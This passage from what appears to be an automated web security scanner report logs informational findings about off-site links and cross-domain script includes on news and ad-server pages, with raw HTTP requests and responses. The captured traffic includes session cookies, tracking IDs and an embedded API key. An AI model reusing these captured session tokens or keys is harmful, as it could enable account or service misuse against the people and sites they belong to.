   //document.write("
...[SNIP]...
<li><a class="icon post-store" href="http://www.cafepress.com/washingtonpost">Post Store</a>
...[SNIP]...
<li><a class="icon facebook" href="http://www.facebook.com/washingtonpost">Facebook</a>
...[SNIP]...
<li><a class="icon twitter" href="http://twitter.com/washingtonpost">Twitter</a>
...[SNIP]...
<li><a class="icon video" href="http://washingtonpostlive.com">Washington Post Live</a>
...[SNIP]...
<li><a href="http://www.washpost.com/index.shtml">About Us</a>
...[SNIP]...
<li><a href="http://www.washpost.com">About The Post</a>
...[SNIP]...
<li><a href="https://subscription.washpost.com/subscriberservices/subscriber.portal?state=welcome&oscode=RPWE">Subscribe</a>
...[SNIP]...
<li><a href="https://subscription.washpost.com/subscriber.portal?state=welcome">Home delivery service</a>
...[SNIP]...
<li><a href="http://thewashingtonpost.newspaperdirect.com/">e-Replica</a>
...[SNIP]...
<li><a href="http://www.washpostco.com/phoenix.zhtml?c=62487&p=irol-landing">Post Company web sites</a>
...[SNIP]...
<li><a href="http://www.washingtonpostads.com/">In the newspaper</a>
...[SNIP]...
<li><a class="slate" target="_blank" href="http://www.slate.com">Slate</a>
...[SNIP]...
<li><a class="who-runs-gov" target="_blank" href="http://www.whorunsgov.com/">Who Runs Gov</a>
...[SNIP]...
<li><a class="express-night-out" target="_blank" href="http://www.expressnightout.com/">Express Night Out</a>
...[SNIP]...
<li><a class="el-tiempo-latino" target="_blank" href="http://eltiempolatino.com/">El Tiempo Latino</a>
...[SNIP]...
<li class="last"><a class="the-root" target="_blank" href="http://theroot.com/">The Root</a>
...[SNIP]...
23.77. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnavLogo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnavLogo.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wp-srv/ssi/globalnav/js/channelnavLogo.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Wed, 30 Dec 2009 18:05:30 GMT
ETag: "1e1f-4b3b966a"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 7711

function placeChannelNavLogo() {
var Registration = function(){}
Registration.REGISTRATION_COOKIE = "wpniuser";
Registration.PLUCK_COOKIE = "hd";
Registration.FACEBOOK_UID_COOKIE=
...[SNIP]...
<br><a href="https://subscription.washpost.com/subscriberservices/subscriber.portal?state=welcome&oscode=RPWS" title="Subscribe | Home Delivery Customer Service">Subscribe</a>
...[SNIP]...
23.78. http://www.washingtonpost.com/wp-srv/ssi/globalnav/js/channelnav_v2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-srv/ssi/globalnav/js/channelnav_v2.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wp-srv/ssi/globalnav/js/channelnav_v2.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Tue, 31 Aug 2010 17:32:50 GMT
ETag: "ac8f-4c7d3cc2"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:03 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 44175

document.write('<link href="http://www.washingtonpost.com/wp-srv/ssi/globalnav/css/wp_global_nav.css" rel="stylesheet" media="all"/>');
document.write('<link href="http://www.washingtonpost.com/wp-sr
...[SNIP]...
</a> | <a href="http://washpost.com/wpnihomepage?nav=globetop">Subscribe to</a>';
   out += '            <a href="http://washpost.com/wpnihomepage?nav=globetop"><img src="http://media.washingtonpost.com/wp-srv/article/pieces/twpLogo_125x20.gif" width="125" height="20" alt="The Washington Post" border="0" style="position:relative;top:4px;"/>
...[SNIP]...
</span> <a href="http://pqasb.pqarchiver.com/washingtonpost/search.html">Search Archives</a>
...[SNIP]...
</span>';
out+='            <a href="http://www.mywashingtonpost.com/">mywashingtonpost.com</a>
...[SNIP]...
</span>';
out+='            <a href="http://www.washingtonpostmedia.com/careers/">Work for Us</a>
...[SNIP]...
</span>';
out+='            <a href="https://subscription.washpost.com/subscriberservices/subscriber.portal?state=welcome&oscode=RPW1"><b>
...[SNIP]...
</span>';
out+='            <a href="http://adsite.washpost.com/">Advertisers</a>
...[SNIP]...
</span>';
out+='            <a href="http://thewashingtonpost.newspaperdirect.com">e-Replica</a>
...[SNIP]...
</span>';
out+='<a href="http://www.cafepress.com/washingtonpost/">The Washington Post Store</a>
...[SNIP]...
</span>';
out+='            <a href="http://www.washpostco.com/index.htm">Information and Other Post Co. Websites</a>
...[SNIP]...
</p>';
//out+= '<script src="https://WaPo.netmng.com/?aid=069" type="text/javascript" language="javascript" defer="defer"></script>
...[SNIP]...
24. Cross-domain script include  previous  next
There are 82 instances of this issue:

24.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:25:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8795

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Apr 29 11:56:20 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript>
<script src="http://cdn.doubleverify.com/script308.js?agnc=930213&cmp=5414127&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62578498&advid=1620481&sid=877237&adid="></script>
...[SNIP]...
24.2. http://ads-vrx.adbrite.com/adserver/display_iab_ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads-vrx.adbrite.com
Path:   /adserver/display_iab_ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adserver/display_iab_ads?sid=1794248&title_color=0000FF&text_color=000000&background_color=fcfaf3&border_color=fcfaf3&url_color=008000&newwin=0&zs=3330305f323530&width=300&height=250&xb=13667710&xbg=12857574&xfb=0&xv=1844495&xat=1&xbt=CpcBidImpl&xc=302e30303131&xe=302e3432&xcc=a4764a3f7ec8a41fd02b6ccdfd0dc845&xdv=false&xg=4b0f5fc0-6071-4bfe-8570-deb210507cbe&xap=0&xaps=0&xfp=BELOW&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934 HTTP/1.1
Host: ads-vrx.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12gg8%2C12ggb%2C6e73"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDg1_T5CRiAk-zNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EIC7iqMKGICT7M0TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; vsd=0@4@4dbe1166@websiteprice.net; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:39 GMT
Content-Length: 980

<html><head></head><body leftmargin=0 topmargin=0 bgcolor="#FFFFFF"> <!-- eyewonder -->

<script language="JavaScript" src="http://guru.sitescout.com/tag.jsp?pid=66738FF&w=300&h=250&rnd=6848350&cm=http://click.adbrite.com/c/CvMCxYEuuBnWZTkIPVmBPewA4aV85MACQqj-YPCxxOMtfurS0IoFdYEHJcpUeMvrhctEXenWGVbDxpsbhT8_FvIMQKcHOIQF4Q9tBQ7Y-8JCDDEBM-kKSZeG7SmDOwbwhtbSgbdw7sLPPEgfvXMKd5P8oWCXY9D2-QHOfg6pX0b9LTtaTQI8E9Y1hXVck9VT8EmRAoIKD-Hz3s10ZMQecjaqU1-wroyCzUm10G_MBmfksRDzlEfApCpYRe4nJ4H9-0oXD48jRc9TSMbik2vsesqhIsvKOysmRbXe1I-7Vja6eSCJtFt5tcQrjLwvpdsi29oHYRBPhO6ykaJrFmFxpw4brKP1BrwMo-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5DuYwFuBIXYIP2GUCTEZxixKIhDFXNJ-gBTmXDtBT1blNlYPRxJB5sCt1ixJxrn4SEN9R-H60fWjJ_p2N9hBFksU/"></script>
...[SNIP]...
24.3. http://bizinformation.co/www.onlinemicrofiche.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bizinformation.co
Path:   /www.onlinemicrofiche.com

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /www.onlinemicrofiche.com HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:11:00 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="t
...[SNIP]...
<link href="http://bizinformation.com/css/style_sp110.css" type="text/css" rel="stylesheet" /><script type="text/javascript" src="http://bizinformation.com/css/jquery.idTabs.min.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAyYvrff9CIah5IlrtMcQtzhQOK5HbXcSpG3ciJJtshANN-4CjvxQayqUA7_6prGx46Q9UAcOdc7sk-w"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
24.4. http://d1.openx.org/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580& HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:07:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 01-May-2012 02:07:47 GMT; path=/
Content-Length: 2280
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<body onload="MAX_adjustframe(window);">
<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&5178448dd1&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=5178448dd1__r_id=bb886cd50eee7cc6d15eccca2981af76__r_ts=lkjpwz__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$"></script>
...[SNIP]...
24.5. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4675364852109088&output=html&h=90&slotname=8870801362&w=728&lmt=1304337912&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912482&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319912561&frm=0&adk=2893163048&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=1&dtd=1173&xpc=ZURzYVvD5x&p=http%3A//www.greenhulk.net HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:05:15 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13601

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#5c9911;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
24.6. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304328302&flash=10.2.154&url=file%3A%2F%2F%2FD%3A%2Fcdn%2Fexamples%2Fdork%2Fhttp-injection%2Fhttp-header-injection-dork-cwe-113-march-8-2011.html&dt=1304310301907&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304310302224&frm=0&adk=1607234649&ga_vid=1507467887.1304310302&ga_sid=1304310302&ga_hid=1320224918&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=967&bih=887&fu=0&ifi=1&dtd=442&xpc=c6VTuxdnT3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 01 May 2011 23:25:04 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 7893

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
24.7. http://insurancenewsnet.com/article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
leclick.net/adi/N4827.272700.8895614262621/B5117134.4;sz=164x200;ord=[timestamp]?" WIDTH=164 HEIGHT=200 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4827.272700.8895614262621/B5117134.4;abr=!ie;sz=164x200;ord=[timestamp]?">
</SCRIPT>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</div><script src="http://cdn.js-kit.com/scripts/comments.js"></script>
...[SNIP]...
</script>
<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
24.8. http://media.washingtonpost.com/wp-srv/ad/tiffany_manager.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.washingtonpost.com
Path:   /wp-srv/ad/tiffany_manager.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-srv/ad/tiffany_manager.js HTTP/1.1
Host: media.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
